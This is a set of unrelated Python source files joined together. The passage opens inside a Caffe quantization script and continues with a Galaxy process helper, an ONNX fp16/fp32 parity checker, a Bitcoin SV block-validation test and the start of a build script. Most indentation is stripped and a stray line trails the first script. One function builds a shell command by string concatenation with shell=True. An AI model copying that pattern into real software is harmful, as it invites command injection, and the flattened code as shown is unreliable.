with open(outf, 'w') as f:
f.write(str(net_proto))
#test network with no string printed
def test_qnet(net_path, caffemodel_path, imdb):
net = caffe.Net(net_path, caffemodel_path, caffe.TEST)
net.name = os.path.splitext(os.path.basename(caffemodel_path))[0]
ap = test_net_silent(net, imdb, max_per_image=args.max_per_image, vis=args.vis)
return ap
#print each layer name and spec
def print_net_layer_names(net):
print("Network layers:")
for name, layer in zip(net._layer_names, net.layers):
if layer.type == 'ConvolutionIVS' or layer.type == 'Convolution':
print("{:<30}: {:22s}({} blobs)".format(name, layer.type, len(layer.blobs)))
print dir(layer)
print layer.reshape
print layer.convolution_param
print net.layer[1].name
def mAP_worker(i, net_path, shared_dict, GPU_ID):
#caffe.set_mode_cpu()
#GPU_ID = 2 # Switch between 0 and 1 depending on the GPU you want to use.
#cfg.GPU_ID = GPU_ID
#caffe.set_device(GPU_ID)
#caffe.set_mode_gpu()
#imdb = get_imdb(args.imdb_name)
#imdb.competition_mode(args.comp_mode)
#if not cfg.TEST.HAS_RPN:
# imdb.set_proposal_method(cfg.TEST.PROPOSAL_METHOD)
ap = float(check_output('./caffe-fast-rcnn/build/tools/caffe test_detection --model=' + net_path + ' --weights=' + args.caffemodel + ' -iterations=' + str(num_iters) + ' -gpu='+str(GPU_ID),shell=True))
#ap = test_qnet(net_path, args.caffemodel, imdb)
#ap = test_qnet(net_path, args.caffemodel, imdb)
shared_dict[i] = ap
def analyze_net_output_IL_worker(net_output_IL, net_input_IL, GPU_ID):
cfg.GPU_ID = GPU_ID
caffe.set_device(GPU_ID)
caffe.set_mode_gpu()
#caffe.set_mode_cpu()
net_proto = read_from_prototxt(args.prototxt_quantized)
net = caffe.Net(args.prototxt_quantized, args.caffemodel, caffe.TEST)
#imdb = get_imdb(args.imdb_name)
#imdb.competition_mode(args.comp_mode)
#if not cfg.TEST.HAS_RPN:
# imdb.set_proposal_method(cfg.TEST.PROPOSAL_METHOD)
net_output_IL_, net_input_IL_ = analyze_net_output_IL(net, net_proto)
for t in net_output_IL_.keys():
net_output_IL[t] = net_output_IL_[t]
for t in net_input_IL_.keys():
net_input_IL[t] = net_input_IL_[t]
def analyze_net_adder_multiplier_IL_worker(net_adder_IL, net_multiplier_IL, GPU_ID):
cfg.GPU_ID = GPU_ID
#caffe.set_mode_cpu()
caffe.set_device(GPU_ID)
caffe.set_mode_gpu()
net_proto_BAC = read_from_prototxt(args.prototxt_quantized_BAC)
net_BAC = caffe.Net(args.prototxt_quantized_BAC, args.caffemodel, caffe.TEST)
#imdb = get_imdb(args.imdb_name)
#imdb.competition_mode(args.comp_mode)
#if not cfg.TEST.HAS_RPN:
# imdb.set_proposal_method(cfg.TEST.PROPOSAL_METHOD)
net_adder_IL_, net_multiplier_IL_ = analyze_net_adder_multiplier_IL(net_BAC, net_proto_BAC)
for t in net_adder_IL_.keys():
net_adder_IL[t] = net_adder_IL_[t]
for t in net_multiplier_IL_.keys():
net_multiplier_IL[t] = net_multiplier_IL_[t]
def analyze_net_param_IL_worker(net_param_IL, GPU_ID):
cfg.GPU_ID = GPU_ID
caffe.set_device(GPU_ID)
caffe.set_mode_gpu()
net_proto = read_from_prototxt(args.prototxt_quantized)
net = caffe.Net(args.prototxt_quantized, args.caffemodel, caffe.TEST)
net_param_IL_ = analyze_net_param_IL(net, net_proto)
for t in net_param_IL_.keys():
net_param_IL[t] = net_param_IL_[t]
if __name__ == '__main__':
args = parse_args()
num_iters = 4952
print('Called with args:')
print(args)
if args.cfg_file is not None:
cfg_from_file(args.cfg_file)
if args.set_cfgs is not None:
cfg_from_list(args.set_cfgs)
cfg.GPU_ID = args.gpu_id
print('Using config:')
pprint.pprint(cfg)
convert_net_to_qnet(args.prototxt, args.prototxt_quantized)
print 'Create quantized prototxt'
print 'Testing Full Precision Accuracy'
manager = multiprocessing.Manager()
shared_dict = manager.dict()
GPU1 = 0
GPU2 = 3
#p = multiprocessing.Process(target=mAP_worker, args=('FP-FP-FP-FP-FP', args.prototxt, shared_dict, GPU1))
timer = Timer()
timer.tic()
#p.start()
#p.join()
timer.toc()
#print ('Took {:.3f}s').format(timer.total_time)
#full_ap = shared_dict['FP-FP-FP-FP-FP']
full_ap = 0.706725
print 'Full precision accuracy : {}'.format(full_ap)
# Bit Width for Analyze
bw_range_conv = [8, 4] #bit width for convolution layers
bw_range_deconv = [32, 16, 8, 4, 2] #bit width for deconvolution layers
bw_range_fc = [32, 16, 8, 7, 6, 5, 4, 2] #bit width for fully connected layers
bw_range_output = [32, 16, 8, 4, 2] #bit width for layer input and output
bw_conv = 6 #just initial
bw_deconv = 6 #just initial
bw_fc = 6 #just initial
bw_output = 32 #just initial
bw_adder = 32 #just initial
bw_multiplier = 32 #just initial
convIL_reduction = -0
deconvIL_reduction = 0
fcIL_reduction = 0
actIL_reduction = 0
adderIL_reduction = 0
multIL_reduction = 0
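    # Each *_reduction value above is passed to the quantize_net_* helpers as
    # extra_IL: it is added to the analyzed integer length, so a negative value
    # trades integer range for additional fractional bits at a fixed bit width.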
print 'Analyzing network'
net_proto = read_from_prototxt(args.prototxt)
has_conv, has_deconv, has_fc = analyze_network(net_proto)
print 'Network Structure'
print 'CONV:{}, DECONV:{}, FC:{}'.format(has_conv, has_deconv, has_fc)
print '-----------------------------------'
net_proto = read_from_prototxt(args.prototxt_quantized)
print 'Analyzing network parameter IL'
net_param_IL = manager.dict()
p = multiprocessing.Process(target=analyze_net_param_IL_worker,
args=(net_param_IL, GPU1, ))
p.start()
p.join()
with open('param_analysis.json', 'w') as outfile:
param_analysis = dict()
param_analysis['net_param_IL'] = dict()
for t in net_param_IL.keys():
param_analysis['net_param_IL'][t] = net_param_IL[t]
json.dump(param_analysis, outfile)
# Analyze Convolution and DeConvolution Layers
if has_conv and False:
print 'Analyzing CONV and DECONV'
print '\tbit reduction\t accuracy'
i = -3
not_found = True
while not_found:
timer = Timer()
timer.tic()
jobs = []
net_proto = read_from_prototxt(args.prototxt_quantized)
quantize_net_conv(net_proto, net_param_IL, bw_conv, i)
write_to_prototxt(net_proto, './temp'+str(i)+'.prototxt')
p1 = multiprocessing.Process(target=mAP_worker, args=(str(i)+'-32-32-32-32',
'./temp'+str(i)+'.prototxt',
shared_dict,GPU1))
jobs.append(p1)
p1.start()
net_proto = read_from_prototxt(args.prototxt_quantized)
quantize_net_conv(net_proto, net_param_IL, bw_conv, i+1)
write_to_prototxt(net_proto, './temp'+str(i+1)+'.prototxt')
p2 = multiprocessing.Process(target=mAP_worker, args=(str(i+1)+'-32-32-32-32',
'./temp'+str(i+1)+'.prototxt',
shared_dict,GPU2))
jobs.append(p2)
p2.start()
for proc in jobs:
proc.join()
timer.toc()
for j in range(i, i+2):
print '\t{}bit:\t\t{} {:.3f}s'.format(j,shared_dict[str(j)+'-32-32-32-32'],timer.total_time)
for j in range(i, i+2):
if shared_dict[str(j)+'-32-32-32-32'] > (full_ap - args.error_margin) or i == 0:
convIL_reduction = j
not_found = False
break;
i = i + 2
#Make Final Quantized Prototxt
print 'Final Quantization Testing'
net_proto = read_from_prototxt(args.prototxt_quantized)
quantize_net_conv(net_proto, net_param_IL, bw_conv, convIL_reduction)
write_to_prototxt(net_proto, './temp.prototxt')
p = multiprocessing.Process(target=mAP_worker, args=('DQ-DQ-DQ-32-32', './temp.prototxt',
shared_dict, GPU1))
p.start()
p.join()
ap = shared_dict['DQ-DQ-DQ-32-32']
layer_ap = ap
#ap = test_qnet('./temp.prototxt', args.caffemodel, imdb)
print '----------------------------------------'
print '{}bit CONV, {}bit FC, {}bit layer output'.format(bw_conv, bw_fc, bw_output)
print 'Accuracy {}'.format(ap)
print 'Dynamic fixed point net:'
print '{}bit CONV and DECONV weights'.format(bw_conv)
print '{}bit layer activations'.format(bw_output)
print 'Please fine-tune'
write_to_prototxt(net_proto, args.prototxt_quantized)
print 'Quantized Model saved to', args.prototxt_quantized
sys.exit(0)
print 'Create Bit-Accurate quantized prototxt'
convert_net_to_qnet_BAC_analysis(args.prototxt_quantized, args.prototxt_quantized_BAC)
net_proto_BAC = read_from_prototxt(args.prototxt_quantized_BAC)
print 'Loading Bit-Accurate quantized prototxt'
#print 'Analyzing network adder and multiplier'
net_adder_IL = manager.dict()
net_multiplier_IL = manager.dict()
if args.accumulator_analysis == None:
print 'Analyzing network adder and multiplier'
p = multiprocessing.Process(target=analyze_net_adder_multiplier_IL_worker,
args=(net_adder_IL, net_multiplier_IL, GPU1))
p.start()
p.join()
with open('accumulator_analysis.json', 'w') as outfile:
accumulator_analysis = dict()
accumulator_analysis['net_adder_IL'] = dict()
accumulator_analysis['net_multiplier_IL'] = dict()
for t in net_adder_IL.keys():
accumulator_analysis['net_adder_IL'][t] = net_adder_IL[t]
for t in net_multiplier_IL.keys():
accumulator_analysis['net_multiplier_IL'][t] = net_multiplier_IL[t]
json.dump(accumulator_analysis, outfile)
else:
print 'Loading network adder and multiplier analysis file'
with open(args.accumulator_analysis) as json_data:
accumulator_analysis = json.load(json_data)
for t in accumulator_analysis['net_adder_IL'].keys():
net_adder_IL[t] = accumulator_analysis['net_adder_IL'][t]
for t in accumulator_analysis['net_multiplier_IL'].keys():
net_multiplier_IL[t] = accumulator_analysis['net_multiplier_IL'][t]
convert_net_to_qnet_BAC(args.prototxt_quantized, args.prototxt_quantized_BAC)
print 'Analyzing layer multiplier'
print '\tbit width\t accuracy'
i = bw_output
not_found = True
while not_found:
timer = Timer()
timer.tic()
jobs = []
net_proto_BAC = read_from_prototxt(args.prototxt_quantized_BAC)
quantize_net_multiplier(net_proto_BAC, net_multiplier_IL, i, multIL_reduction)
write_to_prototxt(net_proto_BAC, './temp'+str(i)+'.prototxt')
p1 = multiprocessing.Process(target=mAP_worker, args=('32-32-32-32-'+str(i),
'./temp'+str(i)+'.prototxt',
shared_dict,GPU1))
jobs.append(p1)
p1.start()
net_proto_BAC = read_from_prototxt(args.prototxt_quantized_BAC)
quantize_net_multiplier(net_proto_BAC, net_multiplier_IL, i+1, multIL_reduction)
write_to_prototxt(net_proto_BAC, './temp'+str(i+1)+'.prototxt')
p2 = multiprocessing.Process(target=mAP_worker, args=('32-32-32-32-'+str(i+1),
'./temp'+str(i+1)+'.prototxt',
shared_dict,GPU2))
jobs.append(p2)
p2.start()
for proc in jobs:
proc.join()
timer.toc()
for j in range(i, i+2):
print '\t{}bit:\t\t{} {:.3f}s'.format(j,shared_dict['32-32-32-32-'+str(j)],timer.total_time)
for j in range(i, i+2):
if shared_dict['32-32-32-32-'+str(j)] > (layer_ap - 0.005):
bw_multiplier = j
not_found = False
break;
i = i + 2
net_proto_BAC = read_from_prototxt(args.prototxt_quantized_BAC)
quantize_net_multiplier(net_proto_BAC, net_multiplier_IL, bw_multiplier, multIL_reduction)
write_to_prototxt(net_proto_BAC, args.prototxt_quantized_BAC)
#bw_h = 16
#bw_l = 0
#bw = 16
#print 'Analyzing layer multiplier'
#print '\tbit width\t accuracy'
#while True:
# net_proto_BAC = read_from_prototxt(args.prototxt_quantized_BAC)
# quantize_net_multiplier(net_BAC, net_proto_BAC, net_multiplier_IL, bw)
# write_to_prototxt(net_proto_BAC, './temp.prototxt')
# ap = test_qnet('./temp.prototxt', args.caffemodel, imdb)
# print '\t{}bit:\t\t{}'.format(bw,ap)
# if ap < (full_ap - args.error_margin):
# bw_l = bw
# else:
# bw_h = bw
# bw_multiplier = bw
# if bw_h - bw_l <=1:
# break
# bw = bw_l + (bw_h-bw_l)/2
print 'Analyzing layer adder'
print '\tbit width\t accuracy'
i = bw_output
not_found = True
while not_found:
timer = Timer()
timer.tic()
jobs = []
net_proto_BAC = read_from_prototxt(args.prototxt_quantized_BAC)
quantize_net_adder(net_proto_BAC, net_adder_IL, i, adderIL_reduction)
write_to_prototxt(net_proto_BAC, './temp'+str(i)+'.prototxt')
p1 = multiprocessing.Process(target=mAP_worker, args=('32-32-32-'+str(i)+'-32',
'./temp'+str(i)+'.prototxt',
shared_dict,GPU1))
jobs.append(p1)
p1.start()
net_proto_BAC = read_from_prototxt(args.prototxt_quantized_BAC)
quantize_net_adder(net_proto_BAC, net_adder_IL, i+1, adderIL_reduction)
write_to_prototxt(net_proto_BAC, './temp'+str(i+1)+'.prototxt')
p2 = multiprocessing.Process(target=mAP_worker, args=('32-32-32-'+str(i+1)+'-32',
'./temp'+str(i+1)+'.prototxt',
shared_dict,GPU2))
jobs.append(p2)
p2.start()
for proc in jobs:
proc.join()
timer.toc()
for j in range(i, i+2):
print '\t{}bit:\t\t{} {:.3f}s'.format(j,shared_dict['32-32-32-'+str(j)+'-32'],timer.total_time)
for j in range(i, i+2):
if shared_dict['32-32-32-'+str(j)+'-32'] > (layer_ap - 0.005):
bw_adder = j
not_found = False
break;
i = i + 2
#bw_h = 16
#bw_l = 0
#bw = 16
#print 'Analyzing layer adder'
#print '\tbit width\t accuracy'
#while True:
# net_proto_BAC = read_from_prototxt(args.prototxt_quantized_BAC)
# quantize_net_adder(net_BAC, net_proto_BAC, net_adder_IL, bw)
# write_to_prototxt(net_proto_BAC, './temp.prototxt')
# ap = test_qnet('./temp.prototxt', args.caffemodel, imdb)
# print '\t{}bit:\t\t{}'.format(bw,ap)
# if ap < (full_ap - args.error_margin):
# bw_l = bw
# else:
# bw_h = bw
# bw_adder = bw
# if bw_h - bw_l <=1:
# break
# bw = bw_l + (bw_h-bw_l)/2
print 'Create Final Bit-Accurate quantized prototxt'
convert_net_to_qnet(args.prototxt, args.prototxt_quantized)
convert_net_to_qnet_BAC(args.prototxt_quantized, args.prototxt_quantized_BAC)
net_proto_final = read_from_prototxt(args.prototxt_quantized_BAC)
print 'Loading Final Bit-Accurate quantized prototxt'
quantize_net_conv(net_proto_final, net_param_IL, bw_conv, convIL_reduction)
quantize_net_deconv(net_proto_final, net_param_IL, bw_conv, deconvIL_reduction)
quantize_net_fc(net_proto_final, net_param_IL, bw_fc, fcIL_reduction)
quantize_net_output(net_proto_final, net_output_IL, net_input_IL, bw_output, actIL_reduction)
quantize_net_multiplier(net_proto_final, net_multiplier_IL, bw_multiplier, multIL_reduction)
quantize_net_adder(net_proto_final, net_adder_IL, bw_adder, adderIL_reduction)
write_to_prototxt(net_proto_final, './temp_f.prototxt')
p = multiprocessing.Process(target=mAP_worker, args=('DQ-DQ-DQ-DQ-DQ', './temp_f.prototxt',
shared_dict,GPU1))
p.start()
p.join()
ap = shared_dict['DQ-DQ-DQ-DQ-DQ']
#ap = test_qnet('./temp_f.prototxt', args.caffemodel, imdb)
print '----------------------------------------'
print '{}bit adder, {}bit multiplier,'.format(bw_adder, bw_multiplier)
print 'Accuracy {}'.format(ap)
print 'Dynamic fixed point net:'
print '{}bit CONV and DECONV weights'.format(bw_conv)
print '{}bit FC weights'.format(bw_fc)
print '{}bit layer activations'.format(bw_output)
print '{}bit adder'.format(bw_adder)
print '{}bit multiplier'.format(bw_multiplier)
print 'Please fine-tune'
write_to_prototxt(net_proto_final, args.prototxt_quantized_BAC)
print 'Bit-Accurate Quantized Model saved to', args.prototxt_quantized_BAC
    GPU_ID = 2  # Select the GPU id to use for this run.
|
lazy_process.py
|
import threading
import time
import subprocess
class LazyProcess( object ):
""" Abstraction describing a command line launching a service - probably
as needed as functionality is accessed in Galaxy.
"""
def __init__( self, command_and_args ):
self.command_and_args = command_and_args
self.thread_lock = threading.Lock()
self.allow_process_request = True
self.process = None
def start_process( self ):
with self.thread_lock:
if self.allow_process_request:
self.allow_process_request = False
t = threading.Thread(target=self.__start)
t.daemon = True
t.start()
def __start(self):
with self.thread_lock:
self.process = subprocess.Popen( self.command_and_args, close_fds=True )
def shutdown( self ):
with self.thread_lock:
self.allow_process_request = False
if self.running:
self.process.terminate()
time.sleep(.01)
if self.running:
self.process.kill()
@property
def running( self ):
return self.process and not self.process.poll()
class NoOpLazyProcess( object ):
""" LazyProcess abstraction meant to describe potentially optional
services, in those cases where one is not configured or valid, this
class can be used in place of LazyProcess.
"""
def start_process( self ):
return
def shutdown( self ):
return
@property
def running( self ):
return False
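# Minimal usage sketch (illustrative only): the command line below is an
# arbitrary example and assumes a Unix-like system where the `sleep` binary is
# available; the timing is best-effort and for demonstration purposes.
if __name__ == "__main__":
    proc = LazyProcess(["sleep", "30"])
    proc.start_process()          # returns immediately; Popen runs on a daemon thread
    time.sleep(0.1)               # give the background thread a moment to spawn the process
    print("running: %s" % bool(proc.running))
    proc.shutdown()               # terminate, then kill if the process is still alive
    proc.process.wait()           # reap the child so .running reflects the exit
    print("running: %s" % bool(proc.running))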
|
parity_check_helper.py
|
# -------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
# --------------------------------------------------------------------------
# This script helps debug parity issues between two ONNX models of the same network, one in fp16 and one in fp32 format
# Please build ORT with --cmake_extra_defines onnxruntime_DEBUG_NODE_INPUTS_OUTPUTS=ON
import math
import multiprocessing
import numpy
import os
import torch
from pathlib import Path
from onnx import numpy_helper, TensorProto
from gpt2_helper import Gpt2Helper
from benchmark_helper import create_onnxruntime_session
NON_ZERO_VALUE = str(1)
ZERO_VALUE = str(0)
def environ_setting_nodes(node_name_filter=None, node_type_filter=None):
# Set I/O data as default
os.environ["ORT_DEBUG_NODE_IO_DUMP_SHAPE_DATA"] = ZERO_VALUE
os.environ["ORT_DEBUG_NODE_IO_DUMP_INPUT_DATA"] = NON_ZERO_VALUE
os.environ["ORT_DEBUG_NODE_IO_DUMP_OUTPUT_DATA"] = NON_ZERO_VALUE
if node_name_filter is not None:
os.environ["ORT_DEBUG_NODE_IO_NAME_FILTER"] = node_name_filter
elif node_type_filter is not None:
os.environ["ORT_DEBUG_NODE_IO_OP_TYPE_FILTER"] = node_type_filter
else:
os.environ["ORT_DEBUG_NODE_IO_DUMPING_DATA_TO_FILES_FOR_ALL_NODES_IS_OK"] = NON_ZERO_VALUE
def environ_setting_paths(output_path):
# Set dumping values to files as default
os.environ["ORT_DEBUG_NODE_IO_DUMP_DATA_DESTINATION"] = "files"
os.environ["ORT_DEBUG_NODE_IO_OUTPUT_DIR"] = output_path
def environ_reset():
for flag in [
"ORT_DEBUG_NODE_IO_DUMP_SHAPE_DATA", "ORT_DEBUG_NODE_IO_DUMP_INPUT_DATA",
"ORT_DEBUG_NODE_IO_DUMP_OUTPUT_DATA", "ORT_DEBUG_NODE_IO_NAME_FILTER", "ORT_DEBUG_NODE_IO_OP_TYPE_FILTER",
"ORT_DEBUG_NODE_IO_DUMP_DATA_TO_FILES", "ORT_DEBUG_NODE_IO_OUTPUT_DIR",
"ORT_DEBUG_NODE_IO_DUMPING_DATA_TO_FILES_FOR_ALL_NODES_IS_OK"
]:
if flag in os.environ:
del os.environ[flag]
def inference(model_path, dummy_inputs, outputs_path, use_gpu):
environ_reset()
environ_setting_nodes()
environ_setting_paths(outputs_path)
session = create_onnxruntime_session(model_path, use_gpu, enable_all_optimization=False)
Gpt2Helper.onnxruntime_inference(session, dummy_inputs)
def generate_outputs_files(model_path, dummy_inputs, outputs_path, use_gpu):
dir_path = Path(outputs_path)
if dir_path.exists() and dir_path.is_dir():
import shutil
shutil.rmtree(outputs_path)
dir_path.mkdir(parents=True, exist_ok=True)
process = multiprocessing.Process(target=inference, args=(model_path, dummy_inputs, outputs_path, use_gpu))
process.start()
process.join()
def post_processing(outputs_path, outputs_path_other):
# Compare outputs with e.g. fp16 and fp32
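    # The per-node difference below is a mean relative error,
    # average(|a_other - a| / (|a_other| + 1e-6)), where the small epsilon
    # guards against division by zero; nodes are later printed sorted by this
    # value so the largest mismatches appear first.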
record = {}
if_close = {}
import glob
for filename in glob.glob(os.path.join(outputs_path, '*.tensorproto')):
filename_other = os.path.join(outputs_path_other, Path(filename).name)
if not os.path.exists(filename_other):
continue
with open(filename, 'rb') as f:
tensor = TensorProto()
tensor.ParseFromString(f.read())
array = numpy_helper.to_array(tensor)
with open(filename_other, 'rb') as f:
tensor_other = TensorProto()
tensor_other.ParseFromString(f.read())
array_other = numpy_helper.to_array(tensor_other)
if array_other.size == 0:
continue
diff = numpy.average(numpy.abs(array_other - array) / (numpy.abs(array_other) + 1e-6))
if math.isnan(diff):
continue
record[Path(filename).name.split(".")[0]] = diff
if_close[Path(filename).name.split(".")[0]] = numpy.allclose(array, array_other, rtol=1e-04, atol=1e-04)
results = [f"Node\tDiff\tClose"]
for k, v in sorted(record.items(), key=lambda x: x[1], reverse=True):
results.append(f"{k}\t{v}\t{if_close[k]}")
for line in results:
print(line)
if __name__ == '__main__':
    # The example below shows how to use this helper to investigate a parity issue between GPT-2 fp32 and fp16 ONNX models
# Please build ORT with --cmake_extra_defines onnxruntime_DEBUG_NODE_INPUTS_OUTPUTS=ON !!
multiprocessing.set_start_method('spawn')
# Generate Inputs
sequence_length = 8
past_sequence_length = 8
batch_size = 5
dummy_inputs_fp16 = Gpt2Helper.get_dummy_inputs(batch_size,
past_sequence_length,
sequence_length,
12,
768,
12,
50257,
device=torch.device("cpu"),
float16=True)
dummy_inputs_fp32 = dummy_inputs_fp16.to_fp32()
# Get GPT-2 model from huggingface using convert_to_onnx.py
os.system('python convert_to_onnx.py -m gpt2 --output gpt2_fp32.onnx -o -p fp32 --use_gpu')
os.system('python convert_to_onnx.py -m gpt2 --output gpt2_fp16.onnx -o -p fp16 --use_gpu')
# Specify the directory to dump the node's I/O
outputs_path_fp32_gpu = "./fp32_gpu"
outputs_path_fp16_gpu = "./fp16_gpu"
generate_outputs_files("./gpt2_fp32.onnx", dummy_inputs_fp32, outputs_path_fp32_gpu, use_gpu=True)
generate_outputs_files("./gpt2_fp16.onnx", dummy_inputs_fp16, outputs_path_fp16_gpu, use_gpu=True)
# Compare each node's I/O value and sort based on average rtol
post_processing(outputs_path_fp16_gpu, outputs_path_fp32_gpu)
|
bsv-pbv-submitblock.py
|
#!/usr/bin/env python3
# Copyright (c) 2019 Bitcoin Association
# Distributed under the Open BSV software license, see the accompanying file LICENSE.
"""
We will test the following situation where block 1 is the tip and three blocks
are sent for parallel validation:
       1
     / | \
    2  3  4
Blocks 2,4 are hard to validate and block 3 is easy to validate.
- Blocks 2,3 are sent via p2p.
- Block 4 is submitted via rpc command submitblock.
Block 3 should be active in the end because it was easiest to validate and
therefore won the validation race.
*This test is similar to bsv-pbv-submitminingsolution.py, which uses a different RPC call
to submit the block.
Additionally, this test checks that blocks with the same height but a later arrival are
also announced to the network after being validated (lines marked with *** at the
beginning of their comments).
"""
import threading
from test_framework.blocktools import prepare_init_chain
from test_framework.util import (
assert_equal,
p2p_port,
get_rpc_proxy,
rpc_url,
get_datadir_path,
wait_until
)
from test_framework.mininode import (
NetworkThread,
NodeConn,
NodeConnCB,
msg_block,
msg_sendcmpct,
msg_getheaders,
ToHex,
CInv
)
from test_framework.test_framework import BitcoinTestFramework, ChainManager
from bsv_pbv_common import (
wait_for_waiting_blocks,
wait_for_validating_blocks
)
class PBVSubmitBlock(BitcoinTestFramework):
def set_test_params(self):
self.setup_clean_chain = True
self.num_nodes = 1
self.chain = ChainManager()
self.extra_args = [["-whitelist=127.0.0.1"]]
def run_test(self):
block_count = 0
        # Create the P2P connections
node0 = NodeConnCB()
connection0 = NodeConn('127.0.0.1', p2p_port(0), self.nodes[0], node0)
node0.add_connection(connection0)
node1 = NodeConnCB()
connection1 = NodeConn('127.0.0.1', p2p_port(0), self.nodes[0], node1)
node1.add_connection(connection1)
# *** Prepare node connection for early announcements testing
node2 = NodeConnCB()
node2.add_connection(NodeConn('127.0.0.1', p2p_port(0), self.nodes[0], node2))
NetworkThread().start()
# wait_for_verack ensures that the P2P connection is fully up.
node0.wait_for_verack()
node1.wait_for_verack()
# *** Activate early announcement functionality for this connection
        # After this point the early announcements are not received yet -
        # we still need to set the latest announced block (CNode::pindexBestKnownBlock),
        # which is set, for example, by sending a getheaders message with a
        # non-null locator
node2.wait_for_verack()
node2.send_message(msg_sendcmpct(announce=True))
self.chain.set_genesis_hash(int(self.nodes[0].getbestblockhash(), 16))
_, outs, block_count = prepare_init_chain(self.chain, 101, 1, block_0=False, start_block=0, node=node0)
out = outs[0]
self.log.info("waiting for block height 101 via rpc")
self.nodes[0].waitforblockheight(101)
tip_block_num = block_count - 1
# adding extra transactions to get different block hashes
block2_hard = self.chain.next_block(block_count, spend=out, extra_txns=8)
block_count += 1
self.chain.set_tip(tip_block_num)
block3_easier = self.chain.next_block(block_count, spend=out, extra_txns=2)
block_count += 1
self.chain.set_tip(tip_block_num)
block4_hard = self.chain.next_block(block_count, spend=out, extra_txns=10)
block_count += 1
# send three "hard" blocks, with waitaftervalidatingblock we artificially
# extend validation time.
self.log.info(f"hard block2 hash: {block2_hard.hash}")
self.nodes[0].waitaftervalidatingblock(block2_hard.hash, "add")
self.log.info(f"hard block4 hash: {block4_hard.hash}")
self.nodes[0].waitaftervalidatingblock(block4_hard.hash, "add")
# make sure block hashes are in waiting list
wait_for_waiting_blocks({block2_hard.hash, block4_hard.hash}, self.nodes[0], self.log)
# *** Complete early announcement setup by sending getheaders message
# with a non-null locator (pointing to the last block that we know
# of on python side - we claim that we know of all the blocks that
# bitcoind node knows of)
#
# We also set on_cmpctblock handler as early announced blocks are
# announced via compact block messages instead of inv messages
node2.send_and_ping(msg_getheaders(locator_have=[int(self.nodes[0].getbestblockhash(), 16)]))
receivedAnnouncement = False
waiting_for_announcement_block_hash = block2_hard.sha256
def on_cmpctblock(conn, message):
nonlocal receivedAnnouncement
message.header_and_shortids.header.calc_sha256()
if message.header_and_shortids.header.sha256 == waiting_for_announcement_block_hash:
receivedAnnouncement = True
node2.on_cmpctblock = on_cmpctblock
# send one block via p2p and one via rpc
node0.send_message(msg_block(block2_hard))
# *** make sure that we receive announcement of the block before it has
# been validated
wait_until(lambda: receivedAnnouncement)
        # make the submitblock rpc call in a separate thread because waitaftervalidatingblock
        # blocks the return of submitblock
submitblock_thread = threading.Thread(target=self.nodes[0].submitblock, args=(ToHex(block4_hard),))
submitblock_thread.start()
# because self.nodes[0] rpc is blocked we use another rpc client
rpc_client = get_rpc_proxy(rpc_url(get_datadir_path(self.options.tmpdir, 0), 0), 0,
coveragedir=self.options.coveragedir)
wait_for_validating_blocks({block2_hard.hash, block4_hard.hash}, rpc_client, self.log)
# *** prepare to intercept block3_easier announcement - it will not be
# announced before validation is complete as early announcement is
# limited to announcing one block per height (siblings are ignored)
# but after validation is complete we should still get the announcing
# compact block message
receivedAnnouncement = False
waiting_for_announcement_block_hash = block3_easier.sha256
self.log.info(f"easy block3 hash: {block3_easier.hash}")
node1.send_message(msg_block(block3_easier))
# *** Make sure that we receive compact block announcement of the block
# after the validation is complete even though it was not the first
# block that was received by bitcoind node.
#
# Also make sure that we receive inv announcement of the block after
# the validation is complete by the nodes that are not using early
# announcement functionality.
wait_until(lambda: receivedAnnouncement)
node0.wait_for_inv([CInv(CInv.BLOCK, block3_easier.sha256)])
        # node 1 was the sender but receives an inv for the block nonetheless
        # (with early announcement that's not the case - the sender does not receive the announcement)
node1.wait_for_inv([CInv(CInv.BLOCK, block3_easier.sha256)])
rpc_client.waitforblockheight(102)
assert_equal(block3_easier.hash, rpc_client.getbestblockhash())
# now we can remove waiting status from blocks and finish their validation
rpc_client.waitaftervalidatingblock(block2_hard.hash, "remove")
rpc_client.waitaftervalidatingblock(block4_hard.hash, "remove")
submitblock_thread.join()
# wait till validation of block or blocks finishes
node0.sync_with_ping()
# easier block should still be on tip
assert_equal(block3_easier.hash, self.nodes[0].getbestblockhash())
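# Illustrative sketch (not part of the original test): the announcement-intercept
# pattern used in run_test() above, factored into a reusable helper. It returns a
# compact block handler together with a predicate that can be passed to wait_until().
# The helper name is hypothetical.
def make_cmpctblock_waiter(expected_sha256):
    state = {"received": False}
    def on_cmpctblock(conn, message):
        message.header_and_shortids.header.calc_sha256()
        if message.header_and_shortids.header.sha256 == expected_sha256:
            state["received"] = True
    return on_cmpctblock, lambda: state["received"]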
if __name__ == '__main__':
PBVSubmitBlock().main()
|
build.py
|
#!/usr/bin/env python3
# Copyright (c) 2020-2021, Videonetics Technology Pvt Ltd. All rights reserved.
# mypy: ignore-errors
import argparse
import glob
import logging
import os
import pathlib
import platform
from posixpath import join
import shutil
import signal
import subprocess
import sys
import time
import traceback
import venv
import zipfile
from distutils.dir_util import copy_tree
from subprocess import PIPE, Popen
from threading import Thread
from urllib.parse import urlparse
from urllib.request import urlretrieve
from dataclasses import dataclass
@dataclass
class Flags:
    module_name: str
cwd: str = ""
virtual_env_path: str = ""
dist_dir: str = ""
base_dir: str = ""
session_dir: str = ""
persistent_dir: str = ""
quiet: bool = True
verbose: bool = True
target_platform: str = None
def get_cwd() -> str:
cwd = os.path.dirname(os.path.realpath(__file__))
if not cwd:
cwd = os.getcwd()
return cwd
FLAGS = Flags(module_name="vrpc")
def log(msg, force=False):
if force or not FLAGS.quiet:
try:
print(msg, file=sys.stderr)
except Exception:
print("<failed to log>", file=sys.stderr)
def log_verbose(msg):
if FLAGS.verbose:
log(msg, force=True)
def fail(msg):
fail_if(True, msg)
def target_platform():
if FLAGS.target_platform is None:
FLAGS.target_platform = platform.system().lower()
return FLAGS.target_platform
def fail_if(p, msg):
if p:
print("error: {}".format(msg), file=sys.stderr)
sys.exit(1)
def mkdir(path):
log_verbose("mkdir: {}".format(path))
pathlib.Path(path).mkdir(parents=True, exist_ok=True)
def rmdir(path):
log_verbose("rmdir: {}".format(path))
shutil.rmtree(path, ignore_errors=True)
def cpdir(src, dest):
log_verbose("cpdir: {} -> {}".format(src, dest))
copy_tree(src, dest, preserve_symlinks=1)
def get_version():
with open(os.path.join(FLAGS.base_dir, "VERSION"), "r") as vfile:
FLAGS.version = vfile.readline().strip()
log("version: {}".format(FLAGS.version))
def reset_version():
    # Reset the version to 0.0.0 in both the VERSION file and .bumpversion.cfg.
